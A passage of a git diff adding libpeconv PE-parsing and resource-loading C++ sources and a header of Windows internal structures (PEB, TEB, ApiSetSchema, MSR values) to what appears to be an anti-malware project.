IMAGE_RESOURCE_DIRECTORY_ENTRY* entry, + peconv::t_on_res_entry_found on_entry) +{ + if (!entry->DataIsDirectory) { +#ifdef _DEBUG + std::cout << "Entry is NOT a directory\n"; +#endif + DWORD offset = entry->OffsetToData; +#ifdef _DEBUG + std::cout << "Offset: " << offset << std::endl; +#endif + IMAGE_RESOURCE_DATA_ENTRY *data_entry = (IMAGE_RESOURCE_DATA_ENTRY*)(offset + (ULONGLONG)upper_dir); + if (!peconv::validate_ptr(modulePtr, moduleSize, data_entry, sizeof(IMAGE_RESOURCE_DATA_ENTRY))) { + return false; + } +#ifdef _DEBUG + std::cout << "Data Offset: " << data_entry->OffsetToData << " : " << data_entry->Size << std::endl; +#endif + BYTE* data_ptr = (BYTE*)((ULONGLONG)modulePtr + data_entry->OffsetToData); + if (!peconv::validate_ptr(modulePtr, moduleSize, data_ptr, data_entry->Size)) { + return false; + } + on_entry(modulePtr, root_dir, data_entry); + return true; + } +#ifdef _DEBUG + std::cout << "Entry is a directory\n"; +#endif + //else: it is a next level directory + DWORD offset = entry->OffsetToDirectory; +#ifdef _DEBUG + std::cout << "Offset: " << offset << std::endl; +#endif + IMAGE_RESOURCE_DIRECTORY *next_dir = (IMAGE_RESOURCE_DIRECTORY*)(offset + (ULONGLONG)upper_dir); + if (!peconv::validate_ptr(modulePtr, moduleSize, next_dir, sizeof(IMAGE_RESOURCE_DIRECTORY))) { + return false; + } + return parse_resource_dir(modulePtr, moduleSize, root_dir, upper_dir, next_dir, on_entry); +} + +bool parse_resource_dir(BYTE* modulePtr, const size_t moduleSize, + IMAGE_RESOURCE_DIRECTORY_ENTRY *root_dir, + const IMAGE_RESOURCE_DIRECTORY *upper_dir, + IMAGE_RESOURCE_DIRECTORY* curr_dir, + peconv::t_on_res_entry_found on_entry) +{ + size_t total_entries = curr_dir->NumberOfIdEntries + curr_dir->NumberOfNamedEntries; + IMAGE_RESOURCE_DIRECTORY_ENTRY* first_entry = (IMAGE_RESOURCE_DIRECTORY_ENTRY*)((ULONGLONG)&curr_dir->NumberOfIdEntries + sizeof(WORD)); + for (size_t i = 0; i < total_entries; i++) { + IMAGE_RESOURCE_DIRECTORY_ENTRY* entry = &first_entry[i]; +#ifdef _DEBUG + std::cout << "Entry:" << std::hex << i << " ; " << "Id: " << entry->Id << " ; dataOffset:" << entry->OffsetToData << "\n"; +#endif + if (root_dir == nullptr) { + root_dir = entry; + } + parse_resource_entry(modulePtr, moduleSize, root_dir, upper_dir, entry, on_entry); + } + return true; +} + +bool peconv::parse_resources(BYTE* modulePtr, t_on_res_entry_found on_entry) +{ + const size_t module_size = peconv::get_image_size(modulePtr); + IMAGE_DATA_DIRECTORY *dir = peconv::get_directory_entry(modulePtr, IMAGE_DIRECTORY_ENTRY_RESOURCE); + if (!dir || dir->VirtualAddress == 0 || dir->Size == 0) { + return false; + } + IMAGE_RESOURCE_DIRECTORY *res_dir = (IMAGE_RESOURCE_DIRECTORY*)(dir->VirtualAddress + (ULONGLONG)modulePtr); + if (!peconv::validate_ptr(modulePtr, module_size, res_dir, sizeof(IMAGE_DEBUG_DIRECTORY))) { + return false; + } + return parse_resource_dir(modulePtr, module_size, nullptr, res_dir, res_dir, on_entry); +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/resource_util.cpp b/ai_anti_malware/libpeconv/libpeconv/src/resource_util.cpp new file mode 100644 index 0000000..6a7e8f5 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/resource_util.cpp @@ -0,0 +1,56 @@ +#include "peconv/resource_util.h" + +#ifdef _DEBUG +#include +#endif + +HMODULE peconv::get_current_module_handle() +{ + HMODULE hMod = NULL; + GetModuleHandleExW( + GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS | GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, + reinterpret_cast(&peconv::get_current_module_handle), + &hMod); + return hMod; +} + +peconv::ALIGNED_BUF peconv::load_resource_data(OUT size_t &out_size, int res_id, const LPSTR res_type, HMODULE hInstance) +{ + if (hInstance == nullptr) { + hInstance = GetModuleHandleA(NULL); + } + HRSRC res = FindResourceA(hInstance, MAKEINTRESOURCEA(res_id), res_type); + if (!res) { +#ifdef _DEBUG + std::cerr << "Cannot find resource" << std::endl; +#endif + return nullptr; + } + HGLOBAL res_handle = LoadResource(hInstance, res); + if (res_handle == nullptr) { +#ifdef _DEBUG + std::cerr << "Cannot get resource handle" << std::endl; +#endif + return nullptr; + } + BYTE* res_data = (BYTE*) LockResource(res_handle); + size_t r_size = static_cast(SizeofResource(hInstance, res)); + if (out_size != 0 && out_size <= r_size) { + r_size = out_size; + } + + peconv::ALIGNED_BUF out_buf = peconv::alloc_aligned(r_size, PAGE_READWRITE); + if (out_buf != nullptr) { + memcpy(out_buf, res_data, r_size); + out_size = r_size; + } else { + out_size = 0; + } + FreeResource(res_handle); + return out_buf; +} + +void peconv::free_resource_data(peconv::ALIGNED_BUF buffer) +{ + peconv::free_aligned(buffer); +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/util.cpp b/ai_anti_malware/libpeconv/libpeconv/src/util.cpp new file mode 100644 index 0000000..167e8b4 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/util.cpp @@ -0,0 +1,100 @@ +#include "peconv/util.h" + +namespace peconv { + DWORD(WINAPI *g_GetProcessId)(IN HANDLE Process) = nullptr; + + HMODULE g_kernel32Hndl = nullptr; + HMODULE g_ntdllHndl = nullptr; + + HMODULE get_kernel32_hndl() + { + if (g_kernel32Hndl == nullptr) { + g_kernel32Hndl = LoadLibraryA("kernel32.dll"); + } + return g_kernel32Hndl; + } + + HMODULE get_ntdll_hndl() + { + if (g_ntdllHndl == nullptr) { + g_ntdllHndl = LoadLibraryA("ntdll.dll"); + } + return g_ntdllHndl; + } +}; + +DWORD ntdll_get_process_id(HANDLE hProcess) +{ +#if !defined PROCESSINFOCLASS + typedef LONG PROCESSINFOCLASS; +#endif + + NTSTATUS(WINAPI *_ZwQueryInformationProcess)( + IN HANDLE ProcessHandle, + IN PROCESSINFOCLASS ProcessInformationClass, + OUT PVOID ProcessInformation, + IN ULONG ProcessInformationLength, + OUT PULONG ReturnLength + ) = NULL; + + HINSTANCE hNtDll = peconv::get_ntdll_hndl(); + if (!hNtDll) { + return 0; + } + + FARPROC procPtr = GetProcAddress(hNtDll, "ZwQueryInformationProcess"); + if (!procPtr) { + return 0; + } + + _ZwQueryInformationProcess = (NTSTATUS(WINAPI *)( + HANDLE, + PROCESSINFOCLASS, + PVOID, + ULONG, + PULONG) + ) procPtr; + + typedef struct _PROCESS_BASIC_INFORMATION { + PVOID Reserved1; + PVOID PebBaseAddress; + PVOID Reserved2[2]; + ULONG_PTR UniqueProcessId; + PVOID Reserved3; + } PROCESS_BASIC_INFORMATION; + + PROCESS_BASIC_INFORMATION pbi = { 0 }; + if (_ZwQueryInformationProcess(hProcess, 0, &pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL) == S_OK) { + const DWORD pid = static_cast(pbi.UniqueProcessId); + return pid; + } + return 0; +} + +DWORD peconv::get_process_id(HANDLE hProcess) +{ + if (!peconv::g_GetProcessId) { + HMODULE kernelLib = peconv::get_kernel32_hndl(); + if (!kernelLib) return FALSE; + + FARPROC procPtr = GetProcAddress(kernelLib, "GetProcessId"); + if (!procPtr) return FALSE; + + peconv::g_GetProcessId = (DWORD(WINAPI *) (IN HANDLE))procPtr; + } + if (peconv::g_GetProcessId) { + return peconv::g_GetProcessId(hProcess); + } + //could not retrieve Pid using GetProcessId, try using NTDLL: + return ntdll_get_process_id(hProcess); +} + +bool peconv::is_padding(const BYTE *cave_ptr, size_t cave_size, const BYTE padding) +{ + for (size_t i = 0; i < cave_size; i++) { + if (cave_ptr[i] != padding) { + return false; + } + } + return true; +} diff --git a/ai_anti_malware/native_struct.h b/ai_anti_malware/native_struct.h new file mode 100644 index 0000000..7d6bfcd --- /dev/null +++ b/ai_anti_malware/native_struct.h @@ -0,0 +1,1028 @@ +#pragma once +#include "head.h" +enum params_type { + PARAMS_INT, + PARAMS_CHAR, + PARAMS_WCHAR, + PARAMS_UINT, +}; + +// ApiSetschema v1 structs +// --------------------------------------------------------------------------------------------- + +// Windows 6.x redirection descriptor, describes forward and backward +// redirections. +typedef struct _REDIRECTION { + DWORD OffsetRedirection1; + USHORT RedirectionLength1; + USHORT _padding1; + DWORD OffsetRedirection2; + USHORT RedirectionLength2; + USHORT _padding2; +} REDIRECTION, *PREDIRECTION; + +// Windows 6.x library director structure, describes redirections. +typedef struct _DLLREDIRECTOR { + DWORD NumberOfRedirections; // Number of REDIRECTION structs. + REDIRECTION Redirection[1]; // array of REDIRECTION structures +} DLLREDIRECTOR, *PDLLREDIRECTOR; + +// Windows 6.x library descriptor structure. These are located as a contiguously +// allocated array from the start of the first structure. +typedef struct _DLLHOSTDESCRIPTOR { + DWORD OffsetDllString; + DWORD StringLength; + DWORD OffsetDllRedirector; // offset to DLLREDIRECTOR +} DLLHOSTDESCRIPTOR, *PDLLHOSTDESCRIPTOR; + +// Windows 6.x ApiSetSchema base structure. +typedef struct _APISETMAP { + DWORD Version; // dummy name (this field is never used) + DWORD NumberOfHosts; // number of DLLHOSTDESCRIPTOR structures following. + DLLHOSTDESCRIPTOR descriptors[1]; // array of DLLHOSTDESCRIPTOR structures. +} APISETMAP, *PAPISETMAP; + +// ApiSetschema v2 structs for Windows 8.1. +// --------------------------------------------------------------------------------------------- + +typedef struct _API_SET_VALUE_ENTRY_V2 { + ULONG Flags; + ULONG NameOffset; + ULONG NameLength; + ULONG ValueOffset; + ULONG ValueLength; +} API_SET_VALUE_ENTRY_V2, *PAPI_SET_VALUE_ENTRY_V2; + +typedef struct _API_SET_VALUE_ARRAY_V2 { + ULONG Flags; + ULONG Count; + _API_SET_VALUE_ENTRY_V2 Array[ANYSIZE_ARRAY]; +} API_SET_VALUE_ARRAY_V2, *PAPI_SET_VALUE_ARRAY_V2; + +typedef struct _API_SET_NAMESPACE_ENTRY_V2 { + ULONG Flags; + ULONG NameOffset; + ULONG NameLength; + ULONG AliasOffset; + ULONG AliasLength; + ULONG DataOffset; // API_SET_VALUE_ARRAY +} API_SET_NAMESPACE_ENTRY_V2, *PAPI_SET_NAMESPACE_ENTRY_V2; + +typedef struct _API_SET_NAMESPACE_ARRAY_V2 { + ULONG Version; + ULONG Size; + ULONG Flags; + ULONG Count; + _API_SET_NAMESPACE_ENTRY_V2 Array[ANYSIZE_ARRAY]; +} API_SET_NAMESPACE_ARRAY_V2, *PAPI_SET_NAMESPACE_ARRAY_V2; + +// ApiSetschema structs for Windows 10. +// --------------------------------------------------------------------------------------------- + +typedef struct _API_SET_VALUE_ENTRY_10 { + ULONG Flags; + ULONG NameOffset; + ULONG NameLength; + ULONG ValueOffset; + ULONG ValueLength; +} API_SET_VALUE_ENTRY_10, *PAPI_SET_VALUE_ENTRY_10; + +typedef struct _API_SET_VALUE_ARRAY_10 { + ULONG Flags; + ULONG NameOffset; + ULONG Unk; + ULONG NameLength; + ULONG DataOffset; + ULONG Count; +} API_SET_VALUE_ARRAY_10, *PAPI_SET_VALUE_ARRAY_10; + +typedef struct _API_SET_NAMESPACE_ENTRY_10 { + uint32_t Flags; + uint32_t NameOffset; + uint32_t NameLength; + uint32_t HashedLength; + uint32_t ValueOffset; + uint32_t ValueCount; +} API_SET_NAMESPACE_ENTRY_10, *PAPI_SET_NAMESPACE_ENTRY_10; + +typedef struct _API_SET_NAMESPACE_ARRAY_10 { + ULONG Version; + ULONG Size; + ULONG Flags; + ULONG Count; + ULONG Start; + ULONG End; + API_SET_NAMESPACE_ENTRY_10 Array[1]; +} API_SET_NAMESPACE_ARRAY_10, *PAPI_SET_NAMESPACE_ARRAY_10; + +typedef struct _UNICODE_STRING { + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} UNICODE_STRING; +typedef UNICODE_STRING* PUNICODE_STRING; +typedef const UNICODE_STRING* PCUNICODE_STRING; +typedef PVOID(NTAPI* RtlImageDirectoryEntryToDataFn)(PVOID, BOOLEAN, USHORT, + PULONG); +enum class Msr : unsigned int { + kIa32ApicBase = 0x01B, + + kIa32FeatureControl = 0x03A, + + kIa32SysenterCs = 0x174, + kIa32SysenterEsp = 0x175, + kIa32SysenterEip = 0x176, + + kIa32Debugctl = 0x1D9, + + kIa32MtrrCap = 0xFE, + kIa32MtrrDefType = 0x2FF, + kIa32MtrrPhysBaseN = 0x200, + kIa32MtrrPhysMaskN = 0x201, + kIa32MtrrFix64k00000 = 0x250, + kIa32MtrrFix16k80000 = 0x258, + kIa32MtrrFix16kA0000 = 0x259, + kIa32MtrrFix4kC0000 = 0x268, + kIa32MtrrFix4kC8000 = 0x269, + kIa32MtrrFix4kD0000 = 0x26A, + kIa32MtrrFix4kD8000 = 0x26B, + kIa32MtrrFix4kE0000 = 0x26C, + kIa32MtrrFix4kE8000 = 0x26D, + kIa32MtrrFix4kF0000 = 0x26E, + kIa32MtrrFix4kF8000 = 0x26F, + + kIa32VmxBasic = 0x480, + kIa32VmxPinbasedCtls = 0x481, + kIa32VmxProcBasedCtls = 0x482, + kIa32VmxExitCtls = 0x483, + kIa32VmxEntryCtls = 0x484, + kIa32VmxMisc = 0x485, + kIa32VmxCr0Fixed0 = 0x486, + kIa32VmxCr0Fixed1 = 0x487, + kIa32VmxCr4Fixed0 = 0x488, + kIa32VmxCr4Fixed1 = 0x489, + kIa32VmxVmcsEnum = 0x48A, + kIa32VmxProcBasedCtls2 = 0x48B, + kIa32VmxEptVpidCap = 0x48C, + kIa32VmxTruePinbasedCtls = 0x48D, + kIa32VmxTrueProcBasedCtls = 0x48E, + kIa32VmxTrueExitCtls = 0x48F, + kIa32VmxTrueEntryCtls = 0x490, + kIa32VmxVmfunc = 0x491, + + kIa32Efer = 0xC0000080, + kIa32Star = 0xC0000081, + kIa32Lstar = 0xC0000082, + + kIa32Fmask = 0xC0000084, + + kIa32FsBase = 0xC0000100, + kIa32GsBase = 0xC0000101, + kIa32KernelGsBase = 0xC0000102, + kIa32TscAux = 0xC0000103, +}; +typedef struct _PEB_LDR_DATA { + BYTE Reserved1[8]; + PVOID Reserved2[3]; + LIST_ENTRY InMemoryOrderModuleList; +} PEB_LDR_DATA, *PPEB_LDR_DATA; + +typedef struct _LDR_DATA_TABLE_ENTRY { + LIST_ENTRY InLoadOrderLinks; + LIST_ENTRY InMemoryOrderLinks; + LIST_ENTRY InInitializationOrderLinks; + PVOID DllBase; + PVOID EntryPoint; + ULONG SizeOfImages; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; + ULONG Flags; + USHORT LoadCount; + USHORT TlsIndex; + union { + LIST_ENTRY HashLinks; + struct { + PVOID SectionPointer; + ULONG CheckSum; + }; + }; + union { + struct { + ULONG TimeDateStamp; + }; + struct { + PVOID LoadedImports; + }; + }; +} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; +typedef struct _RTL_USER_PROCESS_PARAMETERS { + BYTE Reserved1[16]; + PVOID Reserved2[10]; + UNICODE_STRING ImagePathName; + UNICODE_STRING CommandLine; +} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; + +typedef struct _BASE_RELOCATION_ENTRY { + WORD Offset : 12; + WORD Type : 4; +} BASE_RELOCATION_ENTRY; +typedef VOID(NTAPI* PPS_POST_PROCESS_INIT_ROUTINE)(VOID); +// 0x10 bytes (sizeof) +struct _STRING64 { + USHORT Length; // 0x0 + USHORT MaximumLength; // 0x2 + ULONGLONG Buffer; // 0x8 +}; + +// 0x58 bytes (sizeof) +struct X64_PEB_LDR_DATA { + ULONG Length; // 0x0 + UCHAR Initialized; // 0x4 + VOID* SsHandle; // 0x8 + struct _LIST_ENTRY InLoadOrderModuleList; // 0x10 + struct _LIST_ENTRY InMemoryOrderModuleList; // 0x20 + struct _LIST_ENTRY InInitializationOrderModuleList; // 0x30 + VOID* EntryInProgress; // 0x40 + UCHAR ShutdownInProgress; // 0x48 + VOID* ShutdownThreadId; // 0x50 +}; +static_assert(sizeof(X64_PEB_LDR_DATA) == 0x58, "X64_PEB_LDR_DATA Size check"); + +typedef struct X64PEB { + UCHAR InheritedAddressSpace; // 0x0 + UCHAR ReadImageFileExecOptions; // 0x1 + UCHAR BeingDebugged; // 0x2 + union { + UCHAR BitField; // 0x3 + struct { + UCHAR ImageUsesLargePages : 1; // 0x3 + UCHAR IsProtectedProcess : 1; // 0x3 + UCHAR IsImageDynamicallyRelocated : 1; // 0x3 + UCHAR SkipPatchingUser32Forwarders : 1; // 0x3 + UCHAR IsPackagedProcess : 1; // 0x3 + UCHAR IsAppContainer : 1; // 0x3 + UCHAR IsProtectedProcessLight : 1; // 0x3 + UCHAR IsLongPathAwareProcess : 1; // 0x3 + }; + }; + UCHAR Padding0[4]; // 0x4 + ULONGLONG Mutant; // 0x8 + ULONGLONG ImageBaseAddress; // 0x10 + ULONGLONG Ldr; // 0x18 + ULONGLONG ProcessParameters; // 0x20 + ULONGLONG SubSystemData; // 0x28 + ULONGLONG ProcessHeap; // 0x30 + ULONGLONG FastPebLock; // 0x38 + ULONGLONG AtlThunkSListPtr; // 0x40 + ULONGLONG IFEOKey; // 0x48 + union { + ULONG CrossProcessFlags; // 0x50 + struct { + ULONG ProcessInJob : 1; // 0x50 + ULONG ProcessInitializing : 1; // 0x50 + ULONG ProcessUsingVEH : 1; // 0x50 + ULONG ProcessUsingVCH : 1; // 0x50 + ULONG ProcessUsingFTH : 1; // 0x50 + ULONG ProcessPreviouslyThrottled : 1; // 0x50 + ULONG ProcessCurrentlyThrottled : 1; // 0x50 + ULONG ProcessImagesHotPatched : 1; // 0x50 + ULONG ReservedBits0 : 24; // 0x50 + }; + }; + UCHAR Padding1[4]; // 0x54 + union { + ULONGLONG KernelCallbackTable; // 0x58 + ULONGLONG UserSharedInfoPtr; // 0x58 + }; + ULONG SystemReserved; // 0x60 + ULONG AtlThunkSListPtr32; // 0x64 + ULONGLONG ApiSetMap; // 0x68 + ULONG TlsExpansionCounter; // 0x70 + UCHAR Padding2[4]; // 0x74 + ULONGLONG TlsBitmap; // 0x78 + ULONG TlsBitmapBits[2]; // 0x80 + ULONGLONG ReadOnlySharedMemoryBase; // 0x88 + ULONGLONG SharedData; // 0x90 + ULONGLONG ReadOnlyStaticServerData; // 0x98 + ULONGLONG AnsiCodePageData; // 0xa0 + ULONGLONG OemCodePageData; // 0xa8 + ULONGLONG UnicodeCaseTableData; // 0xb0 + ULONG NumberOfProcessors; // 0xb8 + ULONG NtGlobalFlag; // 0xbc + union _LARGE_INTEGER CriticalSectionTimeout; // 0xc0 + ULONGLONG HeapSegmentReserve; // 0xc8 + ULONGLONG HeapSegmentCommit; // 0xd0 + ULONGLONG HeapDeCommitTotalFreeThreshold; // 0xd8 + ULONGLONG HeapDeCommitFreeBlockThreshold; // 0xe0 + ULONG NumberOfHeaps; // 0xe8 + ULONG MaximumNumberOfHeaps; // 0xec + ULONGLONG ProcessHeaps; // 0xf0 + ULONGLONG GdiSharedHandleTable; // 0xf8 + ULONGLONG ProcessStarterHelper; // 0x100 + ULONG GdiDCAttributeList; // 0x108 + UCHAR Padding3[4]; // 0x10c + ULONGLONG LoaderLock; // 0x110 + ULONG OSMajorVersion; // 0x118 + ULONG OSMinorVersion; // 0x11c + USHORT OSBuildNumber; // 0x120 + USHORT OSCSDVersion; // 0x122 + ULONG OSPlatformId; // 0x124 + ULONG ImageSubsystem; // 0x128 + ULONG ImageSubsystemMajorVersion; // 0x12c + ULONG ImageSubsystemMinorVersion; // 0x130 + UCHAR Padding4[4]; // 0x134 + ULONGLONG ActiveProcessAffinityMask; // 0x138 + ULONG GdiHandleBuffer[60]; // 0x140 + ULONGLONG PostProcessInitRoutine; // 0x230 + ULONGLONG TlsExpansionBitmap; // 0x238 + ULONG TlsExpansionBitmapBits[32]; // 0x240 + ULONG SessionId; // 0x2c0 + UCHAR Padding5[4]; // 0x2c4 + union _ULARGE_INTEGER AppCompatFlags; // 0x2c8 + union _ULARGE_INTEGER AppCompatFlagsUser; // 0x2d0 + ULONGLONG pShimData; // 0x2d8 + ULONGLONG AppCompatInfo; // 0x2e0 + struct _STRING64 CSDVersion; // 0x2e8 + ULONGLONG ActivationContextData; // 0x2f8 + ULONGLONG ProcessAssemblyStorageMap; // 0x300 + ULONGLONG SystemDefaultActivationContextData; // 0x308 + ULONGLONG SystemAssemblyStorageMap; // 0x310 + ULONGLONG MinimumStackCommit; // 0x318 + ULONGLONG FlsCallback; // 0x320 + struct LIST_ENTRY64 FlsListHead; // 0x328 + ULONGLONG FlsBitmap; // 0x338 + ULONG FlsBitmapBits[4]; // 0x340 + ULONG FlsHighIndex; // 0x350 + ULONGLONG WerRegistrationData; // 0x358 + ULONGLONG WerShipAssertPtr; // 0x360 + ULONGLONG pUnused; // 0x368 + ULONGLONG pImageHeaderHash; // 0x370 + union { + ULONG TracingFlags; // 0x378 + struct { + ULONG HeapTracingEnabled : 1; // 0x378 + ULONG CritSecTracingEnabled : 1; // 0x378 + ULONG LibLoaderTracingEnabled : 1; // 0x378 + ULONG SpareTracingBits : 29; // 0x378 + }; + }; + UCHAR Padding6[4]; // 0x37c + ULONGLONG CsrServerReadOnlySharedMemoryBase; // 0x380 + ULONGLONG TppWorkerpListLock; // 0x388 + struct LIST_ENTRY64 TppWorkerpList; // 0x390 + ULONGLONG WaitOnAddressHashTable[128]; // 0x3a0 + ULONGLONG TelemetryCoverageHeader; // 0x7a0 + ULONG CloudFileFlags; // 0x7a8 + ULONG CloudFileDiagFlags; // 0x7ac + CHAR PlaceholderCompatibilityMode; // 0x7b0 + CHAR PlaceholderCompatibilityModeReserved[7]; // 0x7b1 + ULONGLONG LeapSecondData; // 0x7b8 + union { + ULONG LeapSecondFlags; // 0x7c0 + struct { + ULONG SixtySecondEnabled : 1; // 0x7c0 + ULONG Reserved : 31; // 0x7c0 + }; + }; + ULONG NtGlobalFlag2; // 0x7c4 +}; +static_assert(sizeof(X64PEB) == 0x7c8, "X64PEB Size check"); +//0x8 bytes (sizeof) +struct _STRING32 +{ + USHORT Length; //0x0 + USHORT MaximumLength; //0x2 + ULONG Buffer; //0x4 +}; +//0x480 bytes (sizeof) +struct X32PEB +{ + UCHAR InheritedAddressSpace; //0x0 + UCHAR ReadImageFileExecOptions; //0x1 + UCHAR BeingDebugged; //0x2 + union + { + UCHAR BitField; //0x3 + struct + { + UCHAR ImageUsesLargePages : 1; //0x3 + UCHAR IsProtectedProcess : 1; //0x3 + UCHAR IsImageDynamicallyRelocated : 1; //0x3 + UCHAR SkipPatchingUser32Forwarders : 1; //0x3 + UCHAR IsPackagedProcess : 1; //0x3 + UCHAR IsAppContainer : 1; //0x3 + UCHAR IsProtectedProcessLight : 1; //0x3 + UCHAR IsLongPathAwareProcess : 1; //0x3 + }; + }; + ULONG Mutant; //0x4 + ULONG ImageBaseAddress; //0x8 + ULONG Ldr; //0xc + ULONG ProcessParameters; //0x10 + ULONG SubSystemData; //0x14 + ULONG ProcessHeap; //0x18 + ULONG FastPebLock; //0x1c + ULONG AtlThunkSListPtr; //0x20 + ULONG IFEOKey; //0x24 + union + { + ULONG CrossProcessFlags; //0x28 + struct + { + ULONG ProcessInJob : 1; //0x28 + ULONG ProcessInitializing : 1; //0x28 + ULONG ProcessUsingVEH : 1; //0x28 + ULONG ProcessUsingVCH : 1; //0x28 + ULONG ProcessUsingFTH : 1; //0x28 + ULONG ProcessPreviouslyThrottled : 1; //0x28 + ULONG ProcessCurrentlyThrottled : 1; //0x28 + ULONG ProcessImagesHotPatched : 1; //0x28 + ULONG ReservedBits0 : 24; //0x28 + }; + }; + union + { + ULONG KernelCallbackTable; //0x2c + ULONG UserSharedInfoPtr; //0x2c + }; + ULONG SystemReserved; //0x30 + ULONG AtlThunkSListPtr32; //0x34 + ULONG ApiSetMap; //0x38 + ULONG TlsExpansionCounter; //0x3c + ULONG TlsBitmap; //0x40 + ULONG TlsBitmapBits[2]; //0x44 + ULONG ReadOnlySharedMemoryBase; //0x4c + ULONG SharedData; //0x50 + ULONG ReadOnlyStaticServerData; //0x54 + ULONG AnsiCodePageData; //0x58 + ULONG OemCodePageData; //0x5c + ULONG UnicodeCaseTableData; //0x60 + ULONG NumberOfProcessors; //0x64 + ULONG NtGlobalFlag; //0x68 + union _LARGE_INTEGER CriticalSectionTimeout; //0x70 + ULONG HeapSegmentReserve; //0x78 + ULONG HeapSegmentCommit; //0x7c + ULONG HeapDeCommitTotalFreeThreshold; //0x80 + ULONG HeapDeCommitFreeBlockThreshold; //0x84 + ULONG NumberOfHeaps; //0x88 + ULONG MaximumNumberOfHeaps; //0x8c + ULONG ProcessHeaps; //0x90 + ULONG GdiSharedHandleTable; //0x94 + ULONG ProcessStarterHelper; //0x98 + ULONG GdiDCAttributeList; //0x9c + ULONG LoaderLock; //0xa0 + ULONG OSMajorVersion; //0xa4 + ULONG OSMinorVersion; //0xa8 + USHORT OSBuildNumber; //0xac + USHORT OSCSDVersion; //0xae + ULONG OSPlatformId; //0xb0 + ULONG ImageSubsystem; //0xb4 + ULONG ImageSubsystemMajorVersion; //0xb8 + ULONG ImageSubsystemMinorVersion; //0xbc + ULONG ActiveProcessAffinityMask; //0xc0 + ULONG GdiHandleBuffer[34]; //0xc4 + ULONG PostProcessInitRoutine; //0x14c + ULONG TlsExpansionBitmap; //0x150 + ULONG TlsExpansionBitmapBits[32]; //0x154 + ULONG SessionId; //0x1d4 + union _ULARGE_INTEGER AppCompatFlags; //0x1d8 + union _ULARGE_INTEGER AppCompatFlagsUser; //0x1e0 + ULONG pShimData; //0x1e8 + ULONG AppCompatInfo; //0x1ec + struct _STRING32 CSDVersion; //0x1f0 + ULONG ActivationContextData; //0x1f8 + ULONG ProcessAssemblyStorageMap; //0x1fc + ULONG SystemDefaultActivationContextData; //0x200 + ULONG SystemAssemblyStorageMap; //0x204 + ULONG MinimumStackCommit; //0x208 + ULONG SparePointers[4]; //0x20c + ULONG SpareUlongs[5]; //0x21c + ULONG WerRegistrationData; //0x230 + ULONG WerShipAssertPtr; //0x234 + ULONG pUnused; //0x238 + ULONG pImageHeaderHash; //0x23c + union + { + ULONG TracingFlags; //0x240 + struct + { + ULONG HeapTracingEnabled : 1; //0x240 + ULONG CritSecTracingEnabled : 1; //0x240 + ULONG LibLoaderTracingEnabled : 1; //0x240 + ULONG SpareTracingBits : 29; //0x240 + }; + }; + ULONGLONG CsrServerReadOnlySharedMemoryBase; //0x248 + ULONG TppWorkerpListLock; //0x250 + struct LIST_ENTRY32 TppWorkerpList; //0x254 + ULONG WaitOnAddressHashTable[128]; //0x25c + ULONG TelemetryCoverageHeader; //0x45c + ULONG CloudFileFlags; //0x460 + ULONG CloudFileDiagFlags; //0x464 + CHAR PlaceholderCompatibilityMode; //0x468 + CHAR PlaceholderCompatibilityModeReserved[7]; //0x469 + ULONG LeapSecondData; //0x470 + union + { + ULONG LeapSecondFlags; //0x474 + struct + { + ULONG SixtySecondEnabled : 1; //0x474 + ULONG Reserved : 31; //0x474 + }; + }; + ULONG NtGlobalFlag2; //0x478 +}; +static_assert(sizeof(X32PEB) == 0x480, "X64PEB Size check"); +//0x4e0 bytes (sizeof) +struct _GDI_TEB_BATCH32 +{ + ULONG Offset : 31; //0x0 + ULONG HasRenderingCommand : 1; //0x0 + ULONG HDC; //0x4 + ULONG Buffer[310]; //0x8 +}; +//0x18 bytes (sizeof) +struct _ACTIVATION_CONTEXT_STACK32 +{ + ULONG ActiveFrame; //0x0 + struct LIST_ENTRY32 FrameListCache; //0x4 + ULONG Flags; //0xc + ULONG NextCookieSequenceNumber; //0x10 + ULONG StackId; //0x14 +}; +//0x8 bytes (sizeof) +struct _CLIENT_ID32 +{ + ULONG UniqueProcess; //0x0 + ULONG UniqueThread; //0x4 +}; +//0x1000 bytes (sizeof) +struct X32TEB +{ + struct _NT_TIB32 NtTib; //0x0 + ULONG EnvironmentPointer; //0x1c + struct _CLIENT_ID32 ClientId; //0x20 + ULONG ActiveRpcHandle; //0x28 + ULONG ThreadLocalStoragePointer; //0x2c + ULONG ProcessEnvironmentBlock; //0x30 + ULONG LastErrorValue; //0x34 + ULONG CountOfOwnedCriticalSections; //0x38 + ULONG CsrClientThread; //0x3c + ULONG Win32ThreadInfo; //0x40 + ULONG User32Reserved[26]; //0x44 + ULONG UserReserved[5]; //0xac + ULONG WOW32Reserved; //0xc0 + ULONG CurrentLocale; //0xc4 + ULONG FpSoftwareStatusRegister; //0xc8 + ULONG ReservedForDebuggerInstrumentation[16]; //0xcc + ULONG SystemReserved1[26]; //0x10c + CHAR PlaceholderCompatibilityMode; //0x174 + UCHAR PlaceholderHydrationAlwaysExplicit; //0x175 + CHAR PlaceholderReserved[10]; //0x176 + ULONG ProxiedProcessId; //0x180 + struct _ACTIVATION_CONTEXT_STACK32 _ActivationStack; //0x184 + UCHAR WorkingOnBehalfTicket[8]; //0x19c + LONG ExceptionCode; //0x1a4 + ULONG ActivationContextStackPointer; //0x1a8 + ULONG InstrumentationCallbackSp; //0x1ac + ULONG InstrumentationCallbackPreviousPc; //0x1b0 + ULONG InstrumentationCallbackPreviousSp; //0x1b4 + UCHAR InstrumentationCallbackDisabled; //0x1b8 + UCHAR SpareBytes[23]; //0x1b9 + ULONG TxFsContext; //0x1d0 + struct _GDI_TEB_BATCH32 GdiTebBatch; //0x1d4 + struct _CLIENT_ID32 RealClientId; //0x6b4 + ULONG GdiCachedProcessHandle; //0x6bc + ULONG GdiClientPID; //0x6c0 + ULONG GdiClientTID; //0x6c4 + ULONG GdiThreadLocalInfo; //0x6c8 + ULONG Win32ClientInfo[62]; //0x6cc + ULONG 